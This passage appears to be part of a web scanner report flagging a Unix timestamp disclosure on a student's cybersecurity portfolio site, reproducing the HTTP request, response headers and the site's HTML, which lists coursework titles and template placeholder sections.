          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          254375293
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        8. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          257747436, which evaluates to: 1978-03-03 05:30:36

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
